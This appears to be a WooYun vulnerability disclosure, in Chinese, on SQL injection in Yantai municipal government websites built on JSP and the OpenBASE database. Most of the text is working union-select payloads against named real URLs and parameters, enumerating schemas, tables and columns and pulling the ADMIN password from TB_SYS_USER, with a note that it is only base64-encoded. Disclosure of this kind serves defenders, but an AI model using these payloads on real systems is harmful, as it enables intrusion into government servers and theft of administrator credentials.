WooYun.org

环境是和jsp+openbae。
openbase是什么？
http://baike.baidu.com/view/1351295.htm
是东软开发的一套闭源数据库系统，没有下载没有试用。
注入点，烟台政府主站：
http://www.yantai.gov.cn/cn/content/facility_yt/shzn/guide/index_lb_xs.jsp?id=80504&flags_id=16764
POC：
http://www.yantai.gov.cn/cn/content/facility_yt/shzn/guide/index_lb_xs.jsp?id=80504&flags_id=16764 and 1=2 union select version()

sqlmap可能跑不出来，因为openBASE有着比较特殊的语法，虽然没有手册和说明，不过我们可以黑盒测一下。
最终的测试结果是，openBASE的基本sql语法是融合了mysql和postgresql的语法，使用limit 1和offset 1等方法来遍历，使用information_schema来存储数据库结构。暂未发现具有特殊功能的sql命令（这个比较难猜）。
以http://xxgk.yantai.gov.cn为例，测试如下：
目标：http://xxgk.yantai.gov.cn/index_show.jsp?sid=0604-02-2014-150692&dept_code=DSJ&columncode=DSJXXGKMLZCXWJ
该注入点同时支持post和get型，后边一律以post来说明。
===========
版本号
columncode=DSJXXGKMLZCXWJ' and 1=2 union select version()--

OpenBASE 6.0.0 on i686-pc-linux-gnu，版本号有点长，后边没显示完。
查库
columncode=DSJXXGKMLZCXWJ' and 1=2 union select schema_name from information_schema.schemata limit 1 offset 5--

查表
columncode=DSJXXGKMLZCXWJ' and 1=2 union select table_name from information_schema.tables where table_schema='YTGOV' limit 1 offset 62--

查字段
columncode=DSJXXGKMLZCXWJ' and 1=2 union select column_name from information_schema.columns where table_name='TB_SYS_USER' limit 1 offset 6--

查值
columncode=DSJXXGKMLZCXWJ' and 1=2 union select PASSWORD from TB_SYS_USER where LOGINNAME='ADMIN' limit 1--

密码base64编码，解码即可。